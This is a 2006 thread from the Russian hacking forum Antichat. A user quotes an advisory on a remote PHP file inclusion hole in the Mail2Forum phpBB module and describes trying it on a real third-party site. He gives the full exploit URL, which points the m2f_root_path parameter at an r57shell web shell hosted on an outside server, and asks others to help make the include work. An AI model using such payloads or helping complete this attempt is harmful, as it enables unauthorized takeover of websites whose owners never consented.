ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Mail2Forum (модуль к phpBB) 1.2
  #1  
Старый 09.08.2006, 10:49
Аватар для Schooly_D
Schooly_D
Новичок
Регистрация: 30.06.2006
Сообщений: 8
Провел на форуме:
46204

Репутация: 3
Question Mail2Forum (модуль к phpBB) 1.2

19 июля, 2006
Программа: Mail2Forum (модуль к phpBB) 1.2, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

http://www.securitylab.ru/vulnerability/270750.php

####

Делать было нечего, дело было вечером, а именно, забрел на секлаб, прочитал про данную уязвимость и очень захотел проверить состоятельность админов многострадального phpBB!

После получаса игры со строкой браузера и с поисковиком, отчаялся найти непропатченные форумы, как наткнулся на один сайт , попытался заинклудить шелл по описанию в секлабе, вроде фишка прошла, в строке браузера имею..

_http://site.eu/forum/m2f/m2f_phpbb204.php?m2f_root_path=http://rst.void.ru/download/r57shell.txt/

после ее ввода нажимаю Enter и лицезрею ГЛАВНУЮ СТРАНИЦУ САЙТА РСТ!

я же вроде инклудил шелл а получил лишь главную страничку!

Странно получается, вроде инклуд не локальный (include_path='.:')...

Пробовал подключать залитый на народ.ру remview, или ничего... или ошибки

помогите разобраться
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Форумы 6 26.10.2006 21:30
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
Скрипт Perl: Узнавалка версии phpBB DetMyl PHP, PERL, MySQL, JavaScript 4 14.02.2006 00:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ